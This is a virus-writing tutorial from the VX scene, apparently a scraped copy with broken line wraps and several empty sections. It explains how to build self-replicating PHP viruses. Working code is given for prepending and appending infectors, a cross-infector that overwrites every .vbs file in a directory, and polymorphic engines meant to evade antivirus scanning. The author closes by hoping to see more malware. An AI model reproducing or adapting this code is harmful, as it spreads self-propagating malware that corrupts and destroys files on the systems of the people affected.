Professional Documents
Culture Documents
******
0) Intro Words
1) File infection
a) Prepending
b) Appending
c) Cross Infection
i) VBS infection
ii) JS infection
iii) CMD infection
d) Entry Point Obscuring
i) Include the virus after a command
ii) Useing a function of the victim
2) Encryption
a) Changing virus to ASCII
b) Useing an intern decryption function
c) Useing changed character string
3) Polymorphism
a) Adding Trash
b) Change Variable Names
c) Number Changing
4) Other Thoughts
a) Find more files
b) Changing the commands
5) Last Words
0) Intro Words
PHP, abbreviate: 'Hypertext Preprocessor', is a very common script language
for the world-wide-web. You're possible to do nearly everthing internet
related with that language. That means, you're also able to make viruses
for it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in
October 2000, and was released in 29A#5. It was no real virus, moreover
a companion. It writes to every PHP-file in the current directory a line,
which let the victim run the virus. But the host doesn't contain the virus.
After searching something about PHP viruses I found out that there is no
high-tech PHP virus so far out, because all the virus I could find are rips
of PHP.Pirus (useing the same prinzip). That was my inspiration in writing
such an article. I wanted to make something totally new, and I guess I had
success. I tested every source with PHP 4.3.3, and everthing worked fine.
Now go on reading this and learn something about PHP viruses! :)
1) File Infection
That's maybe the most important thing, when you want to make a PHP virus,
therefor I want to explain you, how you can infect files with PHP. It shoul
d
be no problme to understand the examples, because I tried it to make as
simple as possible. When the article was written (autumn 2003), there was
no real file infector out there. The only interesting PHP virus so far is
MaskBits' PHP.Pirus, which don't infect files, but use the command 'include
'
that the virus is executed in every PHP file in the current dir. You may th
ink
'Why does he tell me this?". I don't know, just for fun :). Now let me expl
ain
you how to infect files.
a) Prepending
A prepender copies it's code infront of the victim's code, therefor it w
ill
be executed before the victim. That's the main idea of this kind of infe
ction.
But there are some other important things you have to note: To get the v
irus
out of the file, you need any information about where the virus is. In m
y
example the virus uses the first 391 bytes. Next important thing is, tha
t you
must not infect a file two times. What do to against that? Check, if the
file
if already infected. In the following example the virus searchs in the f
irst
13 bytes (in an infected file it's this code: '<?php // SPTH') if there'
s a
'SPTH'. If yes, the file won't be infected. OK, I think, you understood.
Now
let's look at the PHP Prepender Virus example:
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - -
- -
<?php // SPTH
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file)););
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - -
- -
As this is a real easy virus, you should understand it quickly while loo
king
at it. Now i'm going to give you the most important things the example d
oes:
--> Reading the first 391 bytes (which is exactly the virus size)
--> Searchs for every .PHP file in the current directory
--> If not infected, reading the victim
b) Appending
An Appender is a virus, which copies itself after the victim file. It's
really easy to make one. You just have to search the last php-part (or
just make a infection-mark at the begin of the virus. Then you read till
the end, and you have your virus-file. The rest should clear: Search a
victim, check if not infected and copy the virus-body in the end of the
file. I made an exaple for that, as you migth think. The exact explanati
on
will be in the end after the code.
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - -
- -
<?php // SPTH
$string='<?php // '.strstr(fread(fopen(__FILE__,'r'), filesize(__FILE__)), 'SPTH
');
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - -
- -
I've already explained how the prinzip works. Now I'll explain you my ex
ample:
--> Opens the infected file, and save the virus body (searching for 'SPT
H', and
save the rest of the file)
--> Searchs for every php-file in the current directory.
--> Checks is not infected (searchs for the infection mark 'SPTH' anywhe
re in
the file. If not found: Not infected
--> Copies the virusbody to the file
c) Cross Infection
Cross Infection means infecting more than one file extansion. That's rea
lly
useful, because the virus will spread much faster. That was my inspirati
on
in writing this. I found some nice ways how to infect other file-formats
,
therefor I want to show you them. The biggest problem while coding these
things was, that you can't execute a .php file directly, but with an Int
ernet
Browser. Fortunatly Microsoft make it possible to open the Internet Expl
orer
very easiely. :)
i) VBS infection
It's really easy to infect a vbs-file, because the only important thi
ng
if you want to write such a cross infector is, that you don't have to
use
the sign [" = chr(34) ], because VisualBasicScript uses it for string
s, and
since our whole code is a string in the VBS-file, there would be an e
rror.
Now look at the example, and try to understand (shouldn be too diffic
ult,
because I made it very easy to read).
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=WScript.CreateObject('.chr(34).'Scripting.FileSystemObject'.ch
r(34).')'.chr(13).chr(10);
$vbscode.='set shell=WScript.CreateObject('.chr(34).'WScript.Shell'.chr(34).')'.
chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13
).chr(10);
while ($string && $string!='?>')
{
$vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.vbs'))
{
fwrite(fopen($file, 'w'), $vbscode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
It should be totally easy to understand this example. Anyway, I'll gi
ve
you the main ideas of the little code:
--> Splits the php-code (=virus) into lines [chr(13).chr(10)]
--> Makes a vbs code, which generates a new HTM-file containing the v
irus
--> Adds every line to the VBS (as string, so it will be written to t
he
HTM-file, which will be generated by the VBS [?!?! :D])
--> After finishing the VBS-code, it searches for every .VBS in the c
urrent
directory and overwrites it with the code, which we made before.
ii) JS infection
Infecting a JavaScript file is nearly the same as infecting a VBS fi
le, therefore
I won't give you an example. The reason for this is, that we're usin
g WScript in
VBS and JS. The only thing you have to do is to change the 'set' to
'var', and the
'.vbs' to '.js', but i guess, you know that :D. I tried it, and it w
orked fine.
2) Encryption
The first part of the article should give you the idea, how to write a succ
ess-
ful virus in PHP. But more or less, these techniques are easy to detect for
Anti-Virus companies. Therefore I also want to show you, how to fake them.
This
(and of corse the next part: Polymorphism) of the article should help you t
o
write a PHP virus, which can not be detected by simple string scan or just
to
decrease scanstrings. I found many different kinds to crypt a PHP string, a
nd of
corse, I want to tell them to you :)
3) Polymorphism
As everybody knows, this is one of the most important techniques to fake AV
s
and to show, that you know, what you're doing :). So I desided also to writ
e
something about this technique here. In fact, I've never seen any other pol
y
PHP virus around the world (maybe it exists anyway). It was really easy for
me to write some poly-engines, because PHP isn't a really difficult languag
e.
I tried my best to show you, how a PHP poly engine could work.
a) Adding Trash
This technique is a well-known in many script languages. Therefor I toug
ht, it
should also be possible in PHP. Then I sat down, and began to write. Abo
ut 2h
later (with smoking-breaks, sure :D), I had the finished code. First I w
ant
to tell you, what kind of trash/junk/garbage I included in my example:
- // shsdfjksfdjfds
- $kasjkh=192847832;
- $lwekjcmws='iwsdkjhfskjbnla';
Well, now we know, what to include. Anything else to do? Sure, we have t
o delete
the trash again, oterhwise the file would have 2MB after the 10th time y
ou run it,
and I think, you don't want that. :) So, how to delete trash? In my exam
ple I searched
the first letter of a line, and checked, if it's a '/' or a $'. If yes,
it's trash
and we don't have to include it to our new code. It seems I explained ev
erthing.
Now let's have a look at the code:
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - -
- - -
<?php
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php'.chr(13).chr(10);
srand((double)microtime()*1000000);
while ($string && $string!='?>') {
if(rand(0,1)) {
if (rand(0,1)) { $newcont.='// '.trash('').chr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.chr(39).trash('').chr(39).';'.c
hr(13).chr(10); }
if (rand(0,1)) { $newcont.='$'.trash('').'='.rand().';'.chr(13).chr(10); }
}
$string=strtok(chr(13).chr(10));
if ($string{0}!='/' && $string{0}!='$') { $newcont.=$string.chr(13).chr(10); }
fwrite(fopen(__FILE__, 'w'),$newcont);
}
function trash($var) {
do { $var.=chr(rand(97,122)); } while (rand(0,7));
return $var;
}
?>
- - - - - - - - - - - - - - - [ Adding Trash example ] - - - - - - - - - - - -
- - -
Everthing should be clear now, anyway, I'll tell you the most important
things in this
code-snip:
--> It splits the whole filecontent of the virus ('__FILE__', as it's ca
lled in PHP)
to lines (chr(13).chr(10)).
--> One in two, if the last line wasn't a trash, it adds a trashline.
--> If the last line was no trashline, it adds the line to the new conte
nt
--> It writes the new content to the file
b) Variable Changing
This is another well-known script technique to morph the virus. So I did
it again in PHP.
Let's explain the technique. You're useing many varibles in a virus, and
if the variables
have the same name every generation, our friends the AV-guys are able to
use this fact to
detect the virus. So it could be of much value to change the variable-na
mes. How I did it?
I used an array with all my varibale, which i'm using. Than I searched f
or every value from
the array in the virus-file (=i searched for every variable), and replac
ed it via the command
'str_replace' and used a new one, which got by my 'trash-function'. Now
let's look at the
source of the example:
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - -
- - - - -
<?php
$changevars=array('changevars', 'content', 'newvars', 'counti','countj', 'trash'
);
srand((double)microtime()*1000000);
$content=fread(fopen(__FILE__,'r'),filesize(__FILE__));
$counti=0;
while($changevars[$counti]) {
$content=str_replace($changevars[++$counti], trash('',0), $content);
}
fwrite(fopen(__FILE__,'w'),$content);
function trash($newvar, $countj) {
do { $newvar.=chr(rand(97,122)); } while (++$countj<rand(5,15));
return $newvar;
}
?>
- - - - - - - - - - - - - - - [ Variable changing example ] - - - - - - - - - -
- - - - -
Easy code, easy to understand. Anyway, let me tell you, how it exactly w
orks:
--> Makes a new array with all variables and function-names
--> Gets the whole content of the virus-file
--> Replaces every element of the array in the content, and use a new on
e.
--> Writes the content back to the file
c) Number Changing
Every code contains any numbers, whatever this number does. After thinki
ng a little bit
I found out, that I can change the numbers too. So I desited to make a P
HP code, which
changes the numbers in it's code. How can we change a number, you may th
ink. It's really
easy: You make a calculation with that number, which returns the number
you want.
Let's have a look at the possible variants:
--> 10=(12-2)
--> 10=(8+2)
--> 10=(80/8)
I also tried to use div, but there are comma-numbers, which don't really
work. But it's no
problem, there are enought variants with just 3 calculation types. Now I
'll show you, how a
number could be after the 4th morphing:
--> 10=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5)
)))
Now I hope, that you know about the damn cool results of this technique
:)
After explaining the main-thing, I'll show you the little code, who chan
ges the numbers.
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - -
- - - -
<?php
$newcont=fread(fopen(__FILE__,'r'),filesize(__FILE__));
srand((double)microtime()*1000000);
$count=-1; $number='';
while(++$count<strlen($newcont)) {
if (ord($newcont{$count})>47 && ord($newcont{$count})<58) {
$number=$newcont{$count};
while(ord($newcont{++$count})>47 && ord($newcont{$count})<58) { $number.=$ne
wcont{$count}; }
$remn=rand(1,10);
switch(rand(1,3)) {
case 1:
$cont.='('.($number-$remn).'+'.$remn.')'; break;
case 2:
$cont.='('.($number+$remn).'-'.$remn.')'; break;
case 3:
$cont.='('.($number*$remn).'/'.$remn.')'; break;
}
}
$cont.=$newcont{$count};
$number='';
}
fwrite(fopen(__FILE__,'w'),$cont);
?>
- - - - - - - - - - - - - - - [ Number Changing example ] - - - - - - - - - - -
- - - -
Now a shourt explanation about the code:
--> Reads everything from the file
--> Searchs for a number in every sign [sign>chr(47) && sign<chr(58)]
--> Reads the rest of the number
--> makes a new calculation with that number
--> Writes the new content to the file
4) Other thoughts
When I wrote this article, some other ideas came to my mind, therefore
I also what to give the ideas to you. Maybe that some of the ideas are
just non-sense or other are brilliant (I don't think so, but wonder happens
:D ). OK, let's start: This part contains ideas for better hideing to don't
become detected, or how to spread faster. I hope, you also like to read thi
s!
5) Last Words
Comming to an end I want to say that I had really much fun while discovering t
his language,
and I also hope, that you learned some things. I hope, that I will see many ne
w and good PHP
maleware in near future. If I don't see any, I know, that I worked 2-3 month f
or nothing. :)
But let's see it positiv: Now it's easy to write strong viruses for this langu
age, because
the techniques are already discovered. Here at this point I want to thank Mask
Bits/VXI for
making the first PHP maleware called PHP.Pirus, which were released in 29a#5.
This inspired
me in writing this article, because I found out, that the current PHP viruses
are not at
the point where you can say: "It's perfect, we can't make it better." :). Anot
her guy I want
to thank is SnakeByte, because of his articles about Perl poly/EPO/encryption
in 29a#6. It
helped me in some parts of this article. Greets goes also to Kefi, who wrote a
lso a PHP-poly-
morphic virus, which I haven't seen so far. The fact that I know that made me
very activ in
writing this article :). Now I want to send some greets and thanks out to the
world, because
I think that I said everything, what is important:
PhileT0aster and the rest of the rRlf-gang ;), jackie for being something like
an idol for me,
SlageHammer & Knowdeth - the most friendly VX guys i know :), VirusBuster - fo
r answering my
stupid questions every time, Vorgon - for trying to teach me assembler :D, Tor
o - for helping
me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - fo
r beeing a great
guy, VorteX & Worf for being the first guys who helped in the VX-world :), VxF
& Metal for
the great fun in IRC :), Doctor Rave for some great ideas you gave me, prizzy
for the nice email
you wrote, herm1t for hosting my homepage, sinocred for hateing the '<SPTH> hi
' :D, PanoiX for
being a cool guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte f
or cool talks in
IRC (unfortunatly we have nearly no contact recently) and many other cool indi
viduals I know... :)
I also want to send out some group greets: Greets to rRlf (of course :D), 29A,
iKx, SLAM, TKT,
MIONS, Whackerz and every other more or less activ virus-writing-group!